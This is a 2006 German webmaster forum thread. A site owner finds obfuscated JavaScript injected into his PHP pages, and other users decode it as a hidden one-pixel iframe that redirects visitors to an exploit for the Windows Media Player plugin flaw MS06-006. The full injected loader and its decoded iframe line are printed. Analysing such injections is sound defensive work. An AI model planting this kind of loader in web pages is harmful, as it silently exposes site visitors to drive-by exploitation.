Seite gehackt??

Beitrag von **stp69** » 04.08.2006, 13:58

Moin zusammen,

ich habe in php ein kleines Projekt zusammen kopiert und auch darin eine superclix Shoplösung eingebunden. Nichts wildes ein wenig php, etwas html und fertig. Neulich bekomme ich von den Besuchern Infos das die Seite beim Aufruf eine Virenwarnung hervorruft. Ich hab mir die Seiten angesehen und auf der index.php und der index2.php folgenden Code gefunden, der nicht von mir stammt.

Code: Alles auswählen

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode&#40;&#41;&#123;var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!120!45!114!111!97!100!46!99!111!46!107!114!47!114!105!99!104!47!111!117!116!46!112!104!112!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!62!60!47!105!102!114!97!109!101!62!";l=str.length;while&#40;c<=str.length-1&#41;&#123;while&#40;str.charAt&#40;c&#41;!='!'&#41;temp=temp+str.charAt&#40;c++&#41;;c++;out=out+String.fromCharCode&#40;temp&#41;;temp="";&#125;document.write&#40;out&#41;;&#125;
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode&#40;&#41;;
//-->
</SCRIPT>

Der Schnipsel wurde einmal wiederholt.

Ich hab das noch nie gesehen und mich würde mal interesieren was das ist, wo es herkommt und was ich dagegen machen kann. Ich hab nun die Dateien von chmod 644 auf 444 geändert...

Gruß
Stp

von **Anzeige von ABAKUS** »

Beitrag von **magadoo** » 04.08.2006, 14:54

Woher das kommt, kann nur vermutet werden, sql injection ist eine mögliche Variante. Dieses javascript bindet in deine Seite einen iframe ein, der eine fremde Seite mit möglicherweise schadhaften Inhalten lädt.

Beitrag von **haha** » 04.08.2006, 15:12

Die Zahlenkette enthält ASCII-Codes, in Buchstaben ausgedrückt sieht das folgendermaßen aus:

<iframe src=https://x-road.co.kr/rich/out.php width=1 height=1>

Ruft man die URL auf, wird nach https://www.stagespecialties.com/cgi-bi ... i?homepage weitergeleitet, von da aus landet man letztlich bei

https://www.stagespecialties.com/cgi-bi ... e=MS06-006

MS06-006 bezieht sich auf Microsoft Security Bulletin MS06-006: "Sicherheitsanfälligkeit im Windows Media Player-Plug-In kann bei Internetbrowsern anderer Hersteller die Codeausführung von Remotestandorten aus ermöglichen (911564)"

Langer Rede, kurzer Sinn: Dein Server wurde gehackt. Wie der Unhold reingekommen ist, bleibt zu überprüfen. Das kann über schlecht geschriebene Skripte passiert sein, aber auch über den FTP-Zugang. In letzterem Fall hilft Dir chmod nicht weiter, nur ein besseres, aber in jedem Fall anderes Passwort. Es besteht auch die Möglichkeit, dass die Seiten eines anderen Kunden auf dem Server das Einfallstor waren oder dieser Kunde sogar selbst Hand angelegt hat.

von **Anzeige von ABAKUS** »

Beitrag von **depp ich** » 04.08.2006, 16:16

Kann man eigentlich die Darstellung von iFrames (bzw das Laden deren Inhalte) irgendwie schnell mal unterbinden? Im IE oder in Firefox?

iFrames enthalten ohnehin immer nur Werbung oder Mist.

Beitrag von **Anonymous** » 04.08.2006, 18:21

beim IE sollte man zumindest das nachladen von Frames/iFrames von anderen domains verhindern können:

Internetoptionen/Sicherheitseinstellungen/Internet/Stufe anpassen und dort "Subframes zwischen verschiedenen Domänen bewegen" deaktivieren oder auf Eingabeaufforderung umstellen...

beim firefox weis ich es nicht...

Beitrag von **haha** » 04.08.2006, 20:17

depp ich hat geschrieben:Kann man eigentlich die Darstellung von iFrames (bzw das Laden deren Inhalte) irgendwie schnell mal unterbinden? Im […] Firefox?

Im Profilordner unter chrome die Datei userContent.css öffnen (oder anlegen) und

iframe { display:none !important }

einfügen. Der Profilordner ist unter Windows in der Regel C:\Dokumente und Einstellungen\[Benutzername]\Anwendungsdaten\Mozilla\Firefox\Profiles\[Profilname]\.

iFrames enthalten ohnehin immer nur Werbung oder Mist.

Google benutzt IFrames für die Kontoanmeldung.